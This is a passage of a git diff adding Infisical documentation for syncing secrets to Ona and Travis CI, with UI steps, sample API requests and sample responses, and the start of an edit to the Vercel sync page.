Ona](/images/secret-syncs/ona/select-ona-option.png) + + + Configure the **Source** from where secrets should be retrieved, then click **Next**. 
+ + ![Configure Source](/images/secret-syncs/ona/ona-source.png) + + - **Environment**: The project environment to retrieve secrets from. + - **Secret Path**: The folder path to retrieve secrets from. + + + + Configure the **Destination** to where secrets should be deployed, then click **Next**. + + ![Configure Destination](/images/secret-syncs/ona/ona-destination.png) + + - **Ona Connection**: The Ona Connection to authenticate with. + - **Ona Project**: Sync secrets to the selected Ona project as project-level environment variables. Choose the target project from the dropdown populated by your connection. + + + Configure the **Sync Options** to specify how secrets should be synced, then click **Next**. + + ![Configure Sync Options](/images/secret-syncs/ona/ona-options.png) + + - **Initial Sync Behavior**: Determines how Infisical should resolve the initial sync. Ona Sync only supports **Overwrite Destination Secrets**. Any environment-variable secrets at the destination that are not present in Infisical will be removed on the first sync. + - **Key Schema**: Template that determines how secret names are transformed when syncing, using `{{secretKey}}` as a placeholder for the original secret name and `{{environment}}` for the environment. + + We highly recommend using a Key Schema to ensure that Infisical only manages the specific keys you intend, keeping everything else untouched. + + - **Auto-Sync Enabled**: If enabled, secrets will automatically be synced from the source location when changes occur. Disable to enforce manual syncing only. + - **Disable Secret Deletion**: If enabled, Infisical will not remove secrets from the sync destination. Enable this option if you intend to manage some secrets manually outside of Infisical. + + + Configure the **Details** of your Ona Sync, then click **Next**. + + ![Configure Details](/images/secret-syncs/ona/ona-details.png) + + - **Name**: The name of your sync. Must be slug-friendly. 
+ - **Description**: An optional description for your sync. + + + Review your Ona Sync configuration, then click **Create Sync**. + + ![Review Configuration](/images/secret-syncs/ona/ona-review.png) + + + If enabled, your Ona Sync will begin syncing your secrets to the destination endpoint. + + ![Sync Created](/images/secret-syncs/ona/ona-created.png) + + + + + To create an **Ona Sync**, make an API request to the [Create Ona Sync](/api-reference/endpoints/secret-syncs/ona/create) API endpoint. + + ### Sample request + + ```bash Request + curl --request POST \ + --url https://app.infisical.com/api/v1/secret-syncs/ona \ + --header 'Content-Type: application/json' \ + --data '{ + "name": "my-ona-sync", + "projectId": "3c90c3cc-0d44-4b50-8888-8dd25736052a", + "description": "an example sync", + "connectionId": "3c90c3cc-0d44-4b50-8888-8dd25736052a", + "environment": "dev", + "secretPath": "/my-secrets", + "isAutoSyncEnabled": true, + "syncOptions": { + "initialSyncBehavior": "overwrite-destination", + "keySchema": "INFISICAL_{{secretKey}}" + }, + "destinationConfig": { + "projectId": "ona-project-uuid", + "projectName": "my-ona-project" + } + }' + ``` + + ### Sample response + + ```json Response + { + "secretSync": { + "id": "3c90c3cc-0d44-4b50-8888-8dd25736052a", + "name": "my-ona-sync", + "description": "an example sync", + "isAutoSyncEnabled": true, + "version": 1, + "folderId": "3c90c3cc-0d44-4b50-8888-8dd25736052a", + "connectionId": "3c90c3cc-0d44-4b50-8888-8dd25736052a", + "createdAt": "2025-01-23T10:15:00Z", + "updatedAt": "2025-01-23T10:15:00Z", + "syncStatus": "succeeded", + "lastSyncJobId": "123", + "lastSyncMessage": null, + "lastSyncedAt": "2025-01-23T10:15:00Z", + "importStatus": null, + "lastImportJobId": null, + "lastImportMessage": null, + "lastImportedAt": null, + "removeStatus": null, + "lastRemoveJobId": null, + "lastRemoveMessage": null, + "lastRemovedAt": null, + "syncOptions": { + "initialSyncBehavior": "overwrite-destination", + "keySchema": 
"INFISICAL_{{secretKey}}", + "disableSecretDeletion": false + }, + "projectId": "3c90c3cc-0d44-4b50-8888-8dd25736052a", + "connection": { + "app": "ona", + "name": "my-ona-connection", + "id": "3c90c3cc-0d44-4b50-8888-8dd25736052a" + }, + "environment": { + "slug": "dev", + "name": "Development", + "id": "3c90c3cc-0d44-4b50-8888-8dd25736052a" + }, + "folder": { + "id": "3c90c3cc-0d44-4b50-8888-8dd25736052a", + "path": "/my-secrets" + }, + "destination": "ona", + "destinationConfig": { + "projectId": "ona-project-uuid", + "projectName": "my-ona-project" + } + } + } + ``` + + diff --git a/docs/integrations/secret-syncs/travis-ci.mdx b/docs/integrations/secret-syncs/travis-ci.mdx new file mode 100644 index 00000000000..a2d333e6535 --- /dev/null +++ b/docs/integrations/secret-syncs/travis-ci.mdx @@ -0,0 +1,174 @@ +--- +title: "Travis CI Sync" +description: "Learn how to configure a Travis CI Sync for Infisical." +--- + +Infisical's Travis CI Sync keeps your Travis CI repository environment variables in sync with an Infisical project. Account-level environment variables (`account_env_vars`) are not managed by this sync, only repository-scoped environment variables are. + + + `account_env_vars` are not exposed by the Travis CI API for listing or creation, so Infisical cannot sync them. + + +**Prerequisites:** + +- Set up and add secrets to [Infisical Cloud](https://app.infisical.com) +- Create a [Travis CI Connection](/integrations/app-connections/travis-ci) + + + + + + Navigate to **Project** > **Integrations** and select the **Secret Syncs** tab. Click on the **Add Sync** button. + + ![Secret Syncs Tab](/images/secret-syncs/general/secret-sync-tab.png) + + + Select the **Travis CI** option from the list of destinations. + + ![Select Travis CI](/images/secret-syncs/travis-ci/select-travis-ci-option.png) + + + Configure the **Source** from where secrets should be retrieved, then click **Next**. 
+ + ![Configure Source](/images/secret-syncs/travis-ci/travis-ci-source.png) + + - **Environment**: The project environment to retrieve secrets from. + - **Secret Path**: The folder path to retrieve secrets from. + + + If you need to sync secrets from multiple folder locations, check out [secret imports](/documentation/platform/secret-reference#secret-imports). + + + + Configure the **Destination** to where secrets should be deployed, then click **Next**. + + ![Configure Destination](/images/secret-syncs/travis-ci/travis-ci-destination.png) + + - **Travis CI Connection**: The Travis CI Connection to authenticate with. + - **Repository**: The Travis CI repository to sync secrets to. + - **Branch** *Optional*: The branch that synced environment variables will be scoped to on Travis CI. If left empty, the sync will manage environment variables that aren't scoped to any branch (i.e. repository-level variables). + + + Configure the **Sync Options** to specify how secrets should be synced, then click **Next**. + + ![Configure Options](/images/secret-syncs/travis-ci/travis-ci-options.png) + + - **Initial Sync Behavior**: Determines how Infisical should resolve the initial sync. + - **Overwrite Destination Secrets**: Removes any environment variables at the destination not present in Infisical. + + Travis CI does not support importing secrets. + + - **Key Schema**: Template that determines how secret names are transformed when syncing, using `{{secretKey}}` as a placeholder for the original secret name and `{{environment}}` for the environment. + + We highly recommend using a Key Schema to ensure that Infisical only manages the specific keys you intend, keeping everything else untouched. + + - **Auto-Sync Enabled**: If enabled, secrets will automatically be synced when changes occur at the source location. Disable to enforce manual syncing only. + - **Disable Secret Deletion**: If enabled, Infisical will not remove environment variables from Travis CI during a sync. 
Enable this option if you intend to manage some environment variables manually outside of Infisical. + + + Configure the **Details** of your Travis CI Sync, then click **Next**. + + ![Configure Details](/images/secret-syncs/travis-ci/travis-ci-details.png) + + - **Name**: The name of your sync. Must be slug-friendly. + - **Description**: An optional description for your sync. + + + Review your Travis CI Sync configuration, then click **Create Sync**. + + ![Confirm Configuration](/images/secret-syncs/travis-ci/travis-ci-review.png) + + + If enabled, your Travis CI Sync will begin pushing your Infisical secrets to the configured repository (and branch, if scoped). + + ![Sync Created](/images/secret-syncs/travis-ci/travis-ci-created.png) + + + + + To create a **Travis CI Sync**, make an API request to the [Create Travis CI Sync](/api-reference/endpoints/secret-syncs/travis-ci/create) API endpoint. + + The `branch` field inside `destinationConfig` is optional. Omit it to manage repository-level environment variables, or set it to scope the sync to a specific branch on Travis CI. 
+ + ### Sample request + + ```bash Request + curl --request POST \ + --url https://app.infisical.com/api/v1/secret-syncs/travis-ci \ + --header 'Content-Type: application/json' \ + --data '{ + "name": "my-travis-ci-sync", + "projectId": "3c90c3cc-0d44-4b50-8888-8dd25736052a", + "description": "Push Infisical secrets to the Travis CI repository", + "connectionId": "3c90c3cc-0d44-4b50-8888-8dd25736052a", + "environment": "dev", + "secretPath": "/", + "isAutoSyncEnabled": true, + "syncOptions": { + "initialSyncBehavior": "overwrite-destination", + "disableSecretDeletion": false + }, + "destinationConfig": { + "repositoryId": "12345678", + "repositorySlug": "my-org/my-repo", + "branch": "main" + } + }' + ``` + + ### Sample response + + ```bash Response + { + "secretSync": { + "id": "3c90c3cc-0d44-4b50-8888-8dd25736052a", + "name": "my-travis-ci-sync", + "description": "Push Infisical secrets to the Travis CI repository", + "isAutoSyncEnabled": true, + "version": 1, + "folderId": "3c90c3cc-0d44-4b50-8888-8dd25736052a", + "connectionId": "3c90c3cc-0d44-4b50-8888-8dd25736052a", + "createdAt": "2026-04-17T05:31:56Z", + "updatedAt": "2026-04-17T05:31:56Z", + "syncStatus": "succeeded", + "lastSyncJobId": "123", + "lastSyncMessage": null, + "lastSyncedAt": "2026-04-17T05:31:56Z", + "importStatus": null, + "lastImportJobId": null, + "lastImportMessage": null, + "lastImportedAt": null, + "removeStatus": null, + "lastRemoveJobId": null, + "lastRemoveMessage": null, + "lastRemovedAt": null, + "syncOptions": { + "initialSyncBehavior": "overwrite-destination", + "disableSecretDeletion": false + }, + "projectId": "3c90c3cc-0d44-4b50-8888-8dd25736052a", + "connection": { + "app": "travis-ci", + "name": "my-travis-ci-connection", + "id": "3c90c3cc-0d44-4b50-8888-8dd25736052a" + }, + "environment": { + "slug": "dev", + "name": "Development", + "id": "3c90c3cc-0d44-4b50-8888-8dd25736052a" + }, + "folder": { + "id": "3c90c3cc-0d44-4b50-8888-8dd25736052a", + "path": "/" + }, + 
"destination": "travis-ci", + "destinationConfig": { + "repositoryId": "12345678", + "repositorySlug": "my-org/my-repo", + "branch": "main" + } + } + } + ``` + + diff --git a/docs/integrations/secret-syncs/vercel.mdx b/docs/integrations/secret-syncs/vercel.mdx index de83a20681f..83f6c0c612e 100644 --- a/docs/integrations/secret-syncs/vercel.mdx +++ b/docs/integrations/secret-syncs/vercel.mdx @@ -3,6 +3,14 @@ title: "Vercel Sync" description: "Learn how to configure a Vercel Sync for Infisical." --- +Infisical's Vercel Sync lets you automatically push secrets from Infisical into your Vercel project's environment variables, keeping both platforms in sync without manual copy-paste. + +The short video below walks through configuring a Vercel Sync end-to-end. + +
+